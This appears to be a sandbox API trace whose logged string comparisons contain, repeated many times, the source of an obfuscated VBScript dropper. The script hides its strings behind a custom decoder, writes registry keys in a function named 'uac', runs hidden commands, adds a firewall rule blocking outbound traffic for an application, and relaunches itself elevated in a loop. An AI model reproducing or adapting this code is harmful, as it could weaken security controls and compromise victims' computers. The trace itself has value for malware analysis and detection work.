bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0226.353] wcsncmp (_String1="\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 39 [0226.353] wcsncmp (_String1="\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.353] wcsncmp (_String1="Next\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0226.353] wcsncmp (_String1="ext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.353] wcsncmp (_String1="xt\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 